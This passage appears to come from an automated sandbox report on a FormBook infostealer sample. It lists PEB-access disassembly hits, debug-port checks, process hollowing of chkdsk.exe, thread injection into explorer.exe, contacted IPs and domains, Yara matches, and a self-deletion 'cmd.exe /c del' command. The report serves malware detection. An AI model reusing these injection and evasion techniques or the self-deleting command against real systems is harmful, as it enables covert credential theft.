          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]2_2_0168AE73
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]2_2_01677E41
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]2_2_01677E41
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]2_2_01677E41
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]2_2_01677E41
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]2_2_01677E41
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]2_2_01677E41
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AE44 mov eax, dword ptr fs:[00000030h]2_2_0172AE44
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AE44 mov eax, dword ptr fs:[00000030h]2_2_0172AE44
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166E620 mov eax, dword ptr fs:[00000030h]2_2_0166E620
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171FE3F mov eax, dword ptr fs:[00000030h]2_2_0171FE3F
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C600 mov eax, dword ptr fs:[00000030h]2_2_0166C600
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C600 mov eax, dword ptr fs:[00000030h]2_2_0166C600
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C600 mov eax, dword ptr fs:[00000030h]2_2_0166C600
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01698E00 mov eax, dword ptr fs:[00000030h]2_2_01698E00
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A61C mov eax, dword ptr fs:[00000030h]2_2_0169A61C
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A61C mov eax, dword ptr fs:[00000030h]2_2_0169A61C
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721608 mov eax, dword ptr fs:[00000030h]2_2_01721608
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016776E2 mov eax, dword ptr fs:[00000030h]2_2_016776E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016916E0 mov ecx, dword ptr fs:[00000030h]2_2_016916E0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738ED6 mov eax, dword ptr fs:[00000030h]2_2_01738ED6
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016936CC mov eax, dword ptr fs:[00000030h]2_2_016936CC
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A8EC7 mov eax, dword ptr fs:[00000030h]2_2_016A8EC7
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171FEC0 mov eax, dword ptr fs:[00000030h]2_2_0171FEC0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E46A7 mov eax, dword ptr fs:[00000030h]2_2_016E46A7
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01730EA5 mov eax, dword ptr fs:[00000030h]2_2_01730EA5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01730EA5 mov eax, dword ptr fs:[00000030h]2_2_01730EA5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01730EA5 mov eax, dword ptr fs:[00000030h]2_2_01730EA5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FFE87 mov eax, dword ptr fs:[00000030h]2_2_016FFE87
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05433540 mov eax, dword ptr fs:[00000030h]16_2_05433540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E4D3B mov eax, dword ptr fs:[00000030h]16_2_053E4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E4D3B mov eax, dword ptr fs:[00000030h]16_2_053E4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E4D3B mov eax, dword ptr fs:[00000030h]16_2_053E4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05463D40 mov eax, dword ptr fs:[00000030h]16_2_05463D40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]16_2_053C3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053BAD30 mov eax, dword ptr fs:[00000030h]16_2_053BAD30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053DC577 mov eax, dword ptr fs:[00000030h]16_2_053DC577
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053DC577 mov eax, dword ptr fs:[00000030h]16_2_053DC577
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053D7D50 mov eax, dword ptr fs:[00000030h]16_2_053D7D50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0543A537 mov eax, dword ptr fs:[00000030h]16_2_0543A537
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05488D34 mov eax, dword ptr fs:[00000030h]16_2_05488D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F3D43 mov eax, dword ptr fs:[00000030h]16_2_053F3D43
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547E539 mov eax, dword ptr fs:[00000030h]16_2_0547E539
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h]16_2_05436DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h]16_2_05436DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h]16_2_05436DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov ecx, dword ptr fs:[00000030h]16_2_05436DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h]16_2_05436DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h]16_2_05436DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E1DB5 mov eax, dword ptr fs:[00000030h]16_2_053E1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E1DB5 mov eax, dword ptr fs:[00000030h]16_2_053E1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E1DB5 mov eax, dword ptr fs:[00000030h]16_2_053E1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E35A1 mov eax, dword ptr fs:[00000030h]16_2_053E35A1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EFD9B mov eax, dword ptr fs:[00000030h]16_2_053EFD9B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EFD9B mov eax, dword ptr fs:[00000030h]16_2_053EFD9B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547FDE2 mov eax, dword ptr fs:[00000030h]16_2_0547FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547FDE2 mov eax, dword ptr fs:[00000030h]16_2_0547FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547FDE2 mov eax, dword ptr fs:[00000030h]16_2_0547FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547FDE2 mov eax, dword ptr fs:[00000030h]16_2_0547FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h]16_2_053B2D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h]16_2_053B2D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h]16_2_053B2D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h]16_2_053B2D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h]16_2_053B2D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05468DF1 mov eax, dword ptr fs:[00000030h]16_2_05468DF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E2581 mov eax, dword ptr fs:[00000030h]16_2_053E2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E2581 mov eax, dword ptr fs:[00000030h]16_2_053E2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E2581 mov eax, dword ptr fs:[00000030h]16_2_053E2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E2581 mov eax, dword ptr fs:[00000030h]16_2_053E2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CD5E0 mov eax, dword ptr fs:[00000030h]16_2_053CD5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CD5E0 mov eax, dword ptr fs:[00000030h]16_2_053CD5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054805AC mov eax, dword ptr fs:[00000030h]16_2_054805AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054805AC mov eax, dword ptr fs:[00000030h]16_2_054805AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EBC2C mov eax, dword ptr fs:[00000030h]16_2_053EBC2C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0544C450 mov eax, dword ptr fs:[00000030h]16_2_0544C450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0544C450 mov eax, dword ptr fs:[00000030h]16_2_0544C450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]16_2_05471C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548740D mov eax, dword ptr fs:[00000030h]16_2_0548740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548740D mov eax, dword ptr fs:[00000030h]16_2_0548740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548740D mov eax, dword ptr fs:[00000030h]16_2_0548740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436C0A mov eax, dword ptr fs:[00000030h]16_2_05436C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436C0A mov eax, dword ptr fs:[00000030h]16_2_05436C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436C0A mov eax, dword ptr fs:[00000030h]16_2_05436C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436C0A mov eax, dword ptr fs:[00000030h]16_2_05436C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053D746D mov eax, dword ptr fs:[00000030h]16_2_053D746D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EA44B mov eax, dword ptr fs:[00000030h]16_2_053EA44B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05488CD6 mov eax, dword ptr fs:[00000030h]16_2_05488CD6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C849B mov eax, dword ptr fs:[00000030h]16_2_053C849B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436CF0 mov eax, dword ptr fs:[00000030h]16_2_05436CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436CF0 mov eax, dword ptr fs:[00000030h]16_2_05436CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436CF0 mov eax, dword ptr fs:[00000030h]16_2_05436CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054714FB mov eax, dword ptr fs:[00000030h]16_2_054714FB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EE730 mov eax, dword ptr fs:[00000030h]16_2_053EE730
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B4F2E mov eax, dword ptr fs:[00000030h]16_2_053B4F2E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B4F2E mov eax, dword ptr fs:[00000030h]16_2_053B4F2E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05488F6A mov eax, dword ptr fs:[00000030h]16_2_05488F6A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053DF716 mov eax, dword ptr fs:[00000030h]16_2_053DF716
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EA70E mov eax, dword ptr fs:[00000030h]16_2_053EA70E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EA70E mov eax, dword ptr fs:[00000030h]16_2_053EA70E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548070D mov eax, dword ptr fs:[00000030h]16_2_0548070D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548070D mov eax, dword ptr fs:[00000030h]16_2_0548070D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0544FF10 mov eax, dword ptr fs:[00000030h]16_2_0544FF10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0544FF10 mov eax, dword ptr fs:[00000030h]16_2_0544FF10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CFF60 mov eax, dword ptr fs:[00000030h]16_2_053CFF60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CEF40 mov eax, dword ptr fs:[00000030h]16_2_053CEF40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C8794 mov eax, dword ptr fs:[00000030h]16_2_053C8794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F37F5 mov eax, dword ptr fs:[00000030h]16_2_053F37F5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05437794 mov eax, dword ptr fs:[00000030h]16_2_05437794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05437794 mov eax, dword ptr fs:[00000030h]16_2_05437794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05437794 mov eax, dword ptr fs:[00000030h]16_2_05437794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547AE44 mov eax, dword ptr fs:[00000030h]16_2_0547AE44
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547AE44 mov eax, dword ptr fs:[00000030h]16_2_0547AE44
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053BE620 mov eax, dword ptr fs:[00000030h]16_2_053BE620
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EA61C mov eax, dword ptr fs:[00000030h]16_2_053EA61C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EA61C mov eax, dword ptr fs:[00000030h]16_2_053EA61C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053BC600 mov eax, dword ptr fs:[00000030h]16_2_053BC600
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053BC600 mov eax, dword ptr fs:[00000030h]16_2_053BC600
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B439B SetUnhandledExceptionFilter,1_2_003B439B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_003B43CC
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B439B SetUnhandledExceptionFilter,2_2_003B439B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_003B43CC

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.10 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.85.152.171 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.informacion-numero-24-h.site
          Source: C:\Windows\explorer.exeDomain query: www.tzjisheng.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1040000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxskJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"Jump to behavior
          Source: explorer.exe, 00000005.00000000.255915814.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.278458875.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.295991072.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.265115735.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.301324707.0000000005920000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.369902961.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.278476010.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.255927905.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B3283 cpuid 1_2_003B3283
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_003B3EC8
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
